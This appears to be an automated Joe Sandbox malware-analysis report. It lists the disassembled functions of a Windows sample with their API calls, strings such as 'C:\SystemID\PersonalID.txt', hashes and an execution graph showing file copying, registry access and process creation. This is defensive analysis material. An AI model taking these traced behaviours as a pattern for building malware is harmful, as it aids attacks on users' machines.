                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705855051-0
                                                                                                        • Opcode ID: 8261b1a11354e8c3a115cd3cf9b4b14b8385a43febbd1ccc566354ea05c30e0b
                                                                                                        • Instruction ID: d33266af43b53f72a9b4ef64e9468f4aabea570927e9103a7d2ee70d80888235
                                                                                                        • Opcode Fuzzy Hash: 8261b1a11354e8c3a115cd3cf9b4b14b8385a43febbd1ccc566354ea05c30e0b
                                                                                                        • Instruction Fuzzy Hash: ABF02735702209BBE72056659C4AFBB779EDB86760F100226B604E32C1E9512D0162F5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22800 Relevance: 6.0, APIs: 4, Instructions: 28stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F22806
                                                                                                        • _malloc.LIBCMT ref: 00F22814
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: HeapAlloc.KERNEL32(00C00000,00000000,00000001,?,?,?,?,00F33B69,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F2281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F22832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3705855051-0
                                                                                                        • Opcode ID: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction ID: febcf9d74a17deaa687e1e70fc128a6275dd813220bf3766dde3c18c2c0a915a
                                                                                                        • Opcode Fuzzy Hash: 0425119418060a185f1675dee5b3951312f96b91e1490b26333ecec88dd7fc52
                                                                                                        • Instruction Fuzzy Hash: 27E086763021297BE51023696C4EFAB761DCBC27B5F100212F611D22D2CA951C01D1F0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F24920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 84edcd21fafd6f3ad32d636f6edfe323f37f9a45acc2d9bc441904207452c19f
                                                                                                        • Instruction ID: 0869fcbf4c9f62750f0b932e87fd1b958eed4886530623832c47f87a55cceabb
                                                                                                        • Opcode Fuzzy Hash: 84edcd21fafd6f3ad32d636f6edfe323f37f9a45acc2d9bc441904207452c19f
                                                                                                        • Instruction Fuzzy Hash: BAC15E71700229DBCB24CF5CE8C09AAB3B6FF88300B20456DE8468B655DBB4FD55EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F27D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: ea60f3f99ec12e6b5cc474d4c9b2a1f4ac40836337345308c3e5bd0c8ee76a76
                                                                                                        • Instruction ID: cff4ec7d2eb6cbc8120ade880556ce54ca9e6b10145f2466794e2e9287577f8d
                                                                                                        • Opcode Fuzzy Hash: ea60f3f99ec12e6b5cc474d4c9b2a1f4ac40836337345308c3e5bd0c8ee76a76
                                                                                                        • Instruction Fuzzy Hash: BE51BE317087299BCF24EF18E8809AEB7B6FF84310B60456DE8458B251DB31ED55ABE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2B185 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00F2B1BA
                                                                                                          • Part of subcall function 00F211C0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?,?), ref: 00F2120F
                                                                                                          • Part of subcall function 00F211C0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00F21228
                                                                                                          • Part of subcall function 00F211C0: CloseHandle.KERNEL32(00000000), ref: 00F2123D
                                                                                                          • Part of subcall function 00F211C0: MoveFileW.KERNEL32(?,?), ref: 00F21277
                                                                                                          • Part of subcall function 00F2BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                          • Part of subcall function 00F2BA10: RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                          • Part of subcall function 00F2BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00F2BAAD
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B4B3
                                                                                                        • TranslateMessage.USER32(?), ref: 00F2B4CD
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2B4D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                        • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                        • API String ID: 441990211-897913220
                                                                                                        • Opcode ID: fd0c8461a7ccc98b94fea5620713b1a7cfe511e1b78d88b48eb74291d0e4f452
                                                                                                        • Instruction ID: b4cd53832a4b4917778b0a535cd20697718324d844a971e01dcf81abe3ab5a0a
                                                                                                        • Opcode Fuzzy Hash: fd0c8461a7ccc98b94fea5620713b1a7cfe511e1b78d88b48eb74291d0e4f452
                                                                                                        • Instruction Fuzzy Hash: 985137715142549BC718FB60EC52AEFB7A8BF94344F80491DF886431A2EF3CA619DBD2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F6AD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction ID: c2f202b5848a5abe2f7570d544c50872fe37d55eea23359c692cd5efd953d443
                                                                                                        • Opcode Fuzzy Hash: 22be7e925578322317a2e254195904bfb5bbee497444d885576350051d9aa381
                                                                                                        • Instruction Fuzzy Hash: 7F2107B6F443217BE200666CFC92B25B399EB94B14F004125F718EB2C1D6B4FC1197D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F23C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F23CA0
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        • _memset.LIBCMT ref: 00F23C83
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                        • Opcode ID: b79e61f5db3da0874f55e1d095cbcda5e799c13574f4871ac57ce446e45df37b
                                                                                                        • Instruction ID: 131b50013e31c66600f6491ecfa7c810c8ac822c7be1eef5c44ff4ce90be11a9
                                                                                                        • Opcode Fuzzy Hash: b79e61f5db3da0874f55e1d095cbcda5e799c13574f4871ac57ce446e45df37b
                                                                                                        • Instruction Fuzzy Hash: ED01B1F29007105BE330AF19E801757F7E8AF40B70F14842DE99997681E7B9E948D791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C919 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fputws$CreateDirectory
                                                                                                        • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                        • API String ID: 2590308727-54166481
                                                                                                        • Opcode ID: 36de37488238e83def194c8b2af580738d6f8e86a3a7bb8beab58ca2f877ce0c
                                                                                                        • Instruction ID: b987bced7b68c86a169a4428d9dca62998358cf9978f9389f99ea70dd60efbff
                                                                                                        • Opcode Fuzzy Hash: 36de37488238e83def194c8b2af580738d6f8e86a3a7bb8beab58ca2f877ce0c
                                                                                                        • Instruction Fuzzy Hash: 7B112772E803159BDF31DF68DC523CE77A0AF10724F040529EC5952181E77A9A94ABC2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F30DB3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00F30E13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __calloc_crt
                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                        • API String ID: 3494438863-969893948
                                                                                                        • Opcode ID: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction ID: 788743a592a0546ae71b4a40a1045eb91d6fa60b5a0de4bf7b1bb56b7f569e9a
                                                                                                        • Opcode Fuzzy Hash: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction Fuzzy Hash: FCF0A471709211DBE734DA6ABC21BA137D8B715770F10441BF280CB188EF7D88816794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F90620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F90686
                                                                                                          • Part of subcall function 00F64C00: _raise.LIBCMT ref: 00F64C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F9062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F90638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset_raise
                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                        • Opcode ID: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction ID: 6e3f65c682a5d630d58f9931d5508eeecda024f9ad8d83db3ca882233a9ebdce
                                                                                                        • Opcode Fuzzy Hash: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction Fuzzy Hash: CB018F75A002009FD711DF08EC42E55B7E1AFC8710F154428F584CB352DB62EC559B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.3%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:13.8%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:199
                                                                                                        execution_graph 38829 f2bae0 38830 f2bb13 38829->38830 38831 f2bba0 38829->38831 38834 f2bb54 38830->38834 38835 f2bb15 38830->38835 38832 f2bf3d 38831->38832 38833 f2bbad 38831->38833 38842 f2bf65 IsWindow 38832->38842 38843 f2bf9a DefWindowProcW 38832->38843 38837 f2bbb0 DefWindowProcW 38833->38837 38838 f2bbd7 38833->38838 38836 f2bb70 38834->38836 38841 f2bb75 DefWindowProcW 38834->38841 38839 f2bb47 PostQuitMessage 38835->38839 38840 f2bb1c 38835->38840 38905 f30c62 38838->38905 38839->38836 38840->38836 38840->38837 38847 f2bb2e 38840->38847 38842->38836 38845 f2bf73 DestroyWindow 38842->38845 38845->38836 38847->38836 38868 f21cd0 38847->38868 38849 f2bc26 38929 f2ce80 59 API calls _memmove 38849->38929 38852 f2bb3f 38852->38842 38853 f2bc3a 38930 f30bed 38853->38930 38855 f2befb IsWindow 38856 f2bf11 38855->38856 38857 f2bf28 38855->38857 38856->38857 38858 f2bf1a DestroyWindow 38856->38858 38857->38836 38858->38857 38859 f2bef7 38859->38855 38859->38857 38860 f24690 59 API calls 38864 f2bcdc 38860->38864 38864->38855 38864->38859 38864->38860 38867 f2be8f CreateThread 38864->38867 38936 f1eff0 65 API calls 38864->38936 38937 f2c330 38864->38937 38943 f2c240 38864->38943 38949 f2b8b0 38864->38949 38971 f2ce80 59 API calls _memmove 38864->38971 38867->38864 38972 f3f7c0 38868->38972 38871 f21d20 _memset 38872 f21d40 RegQueryValueExW RegCloseKey 38871->38872 38873 f21d8f 38872->38873 38974 f25c10 38873->38974 38875 f21dbf 38876 f21dd1 lstrlenA 38875->38876 38877 f21e7c 38875->38877 38989 f23520 38876->38989 38879 f21e94 6 API calls 38877->38879 38880 f21e89 38877->38880 38881 f21ef5 UuidCreate UuidToStringW 38879->38881 38880->38879 38884 f21f36 38881->38884 38882 f21e3c PathFileExistsW 38882->38877 38886 f21e52 38882->38886 38883 f21df1 38883->38882 38884->38884 38885 f25c10 59 API calls 38884->38885 38887 f21f59 RpcStringFreeW PathAppendW CreateDirectoryW 38885->38887 38889 f21e6a 38886->38889 38992 f24690 38886->38992 38891 f21fce 38887->38891 38893 f21f98 38887->38893 38889->38852 38890 f25c10 59 API calls 38890->38891 38892 f25c10 59 API calls 38891->38892 38894 f2201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38892->38894 38893->38890 38895 f221d1 38894->38895 38896 f2207c _memset 38894->38896 38895->38889 38897 f22095 6 API calls 38896->38897 38898 f22115 _memset 38897->38898 38899 f22109 38897->38899 38901 f22125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38898->38901 39015 f23260 38899->39015 38902 f221b2 38901->38902 38903 f221aa GetLastError 38901->38903 38904 f221c0 WaitForSingleObject 38902->38904 38903->38895 38904->38895 38904->38904 38906 f30cdd 38905->38906 38910 f30c6e 38905->38910 39064 f3793d DecodePointer 38906->39064 38908 f30ce3 38911 f35208 __wcsnicmp 57 API calls 38908->38911 38912 f30ca1 RtlAllocateHeap 38910->38912 38915 f30c79 38910->38915 38916 f30cc9 38910->38916 38920 f30cc7 38910->38920 39060 f3793d DecodePointer 38910->39060 38913 f2bbe9 GetComputerNameW 38911->38913 38912->38910 38912->38913 38922 f23100 38913->38922 38915->38910 39055 f37f51 58 API calls __NMSG_WRITE 38915->39055 39056 f37fae 58 API calls 6 library calls 38915->39056 39057 f37b0b 38915->39057 39061 f35208 38916->39061 38921 f35208 __wcsnicmp 57 API calls 38920->38921 38921->38913 38923 f23133 38922->38923 38924 f23121 38922->38924 38927 f25c10 59 API calls 38923->38927 38925 f25c10 59 API calls 38924->38925 38926 f2312c 38925->38926 38926->38849 38928 f23159 38927->38928 38928->38849 38929->38853 38931 f30bf6 RtlFreeHeap 38930->38931 38935 f30c1f _rand_s 38930->38935 38932 f30c0b 38931->38932 38931->38935 38933 f35208 __wcsnicmp 56 API calls 38932->38933 38934 f30c11 GetLastError 38933->38934 38934->38935 38935->38864 38936->38864 39104 f2d3c0 38937->39104 38940 f2c35b 38940->38864 38941 f5f23e 59 API calls 38942 f2c37a 38941->38942 38942->38864 39114 f2d340 38943->39114 38946 f2c26b 38946->38864 38947 f5f23e 59 API calls 38948 f2c28a 38947->38948 38948->38864 38950 f2b8d6 38949->38950 38953 f2b8e0 38949->38953 38951 f24690 59 API calls 38950->38951 38951->38953 38952 f2b916 38955 f24690 59 API calls 38952->38955 38956 f2b930 38952->38956 38953->38952 38954 f24690 59 API calls 38953->38954 38954->38952 38955->38956 38957 f2b94a 38956->38957 38959 f24690 59 API calls 38956->38959 38958 f2b964 38957->38958 38960 f24690 59 API calls 38957->38960 39127 f2bfd0 38958->39127 38959->38957 38960->38958 38962 f2b976 38963 f2bfd0 59 API calls 38962->38963 38964 f2b988 38963->38964 38965 f2bfd0 59 API calls 38964->38965 38966 f2b99a 38965->38966 38967 f2b9b4 38966->38967 38968 f24690 59 API calls 38966->38968 38969 f2b9f2 38967->38969 39139 f23ff0 38967->39139 38968->38967 38969->38864 38971->38864 38973 f21cf2 RegOpenKeyExW 38972->38973 38973->38871 38973->38889 38975 f25c66 38974->38975 38980 f25c1e 38974->38980 38976 f25c76 38975->38976 38977 f25cff 38975->38977 38983 f25c88 ___crtGetEnvironmentStringsW 38976->38983 39022 f26950 38976->39022 39031 f5f23e 38977->39031 38980->38975 38986 f25c45 38980->38986 38983->38875 38987 f24690 59 API calls 38986->38987 38988 f25c60 38987->38988 38988->38875 38990 f24690 59 API calls 38989->38990 38991 f23550 38990->38991 38991->38883 38993 f246a9 38992->38993 38994 f2478c 38992->38994 38996 f246b6 38993->38996 38997 f246e9 38993->38997 39053 f5f26c 59 API calls 3 library calls 38994->39053 38998 f246c2 38996->38998 38999 f24796 38996->38999 39000 f247a0 38997->39000 39001 f246f5 38997->39001 39052 f23340 59 API calls _memmove 38998->39052 39054 f5f26c 59 API calls 3 library calls 38999->39054 39002 f5f23e 59 API calls 39000->39002 39004 f24707 ___crtGetEnvironmentStringsW 39001->39004 39006 f26950 59 API calls 39001->39006 39005 f247aa 39002->39005 39004->38889 39007 f247bf 39005->39007 39011 f247cd 39005->39011 39006->39004 39009 f25c10 59 API calls 39007->39009 39012 f247c8 39009->39012 39010 f246e0 39010->38889 39011->39011 39013 f25c10 59 API calls 39011->39013 39012->38889 39014 f247ec 39013->39014 39014->38889 39016 f2326f 39015->39016 39017 f2327d 39015->39017 39018 f25c10 59 API calls 39016->39018 39020 f25c10 59 API calls 39017->39020 39019 f23278 39018->39019 39019->38898 39021 f2329c 39020->39021 39021->38898 39023 f26986 